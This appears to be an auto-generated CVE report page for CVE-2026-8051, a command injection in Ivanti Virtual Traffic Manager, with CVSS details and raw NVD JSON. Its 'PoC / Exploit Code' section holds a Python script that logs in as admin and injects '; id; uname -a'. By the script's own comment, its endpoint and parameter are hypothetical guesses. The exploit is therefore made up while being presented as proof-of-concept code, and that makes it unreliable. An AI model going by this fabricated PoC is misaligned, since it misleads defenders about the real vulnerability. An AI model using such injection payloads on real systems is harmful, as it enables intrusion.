Security Vulnerability Report
中文
CVE-2026-8051 CVSS 7.2 HIGH

CVE-2026-8051

Published: 2026-05-12 15:16:17
Last Modified: 2026-05-12 16:38:24
Source: 3c1d8aa1-5a33-4ea4-8992-aadd6440af75

Description

OS command injection in Ivanti Virtual Traffic Manager before version 22.9r4 allows a remote authenticated attacker with admin privileges to achieve remote code execution.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ivanti Virtual Traffic Manager < 22.9r4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "https://<vtm-host>:9070/api/status" username = "admin" password = "password" # Authentication session session = requests.Session() login_payload = {"username": username, "password": password} session.post("https://<vtm-host>:9070/api/login", json=login_payload, verify=False) # Malicious payload to inject OS command (e.g., ping back or reverse shell) # The vulnerable parameter is hypothetical based on the description injection_payload = "; id; uname -a" # Exploit request headers = {"Content-Type": "application/json"} data = { "action": "some_action", "param": injection_payload # Injecting command here } response = session.post(target_url, json=data, headers=headers, verify=False) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check for command execution output in response.") print(response.text) else: print("[-] Failed to send request.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8051", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2026-05-12T15:16:17.267", "lastModified": "2026-05-12T16:38:24.040", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS command injection in Ivanti Virtual Traffic Manager before version 22.9r4 allows a remote authenticated attacker with admin privileges to achieve remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2026-8051?language=en_US", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75"}]}}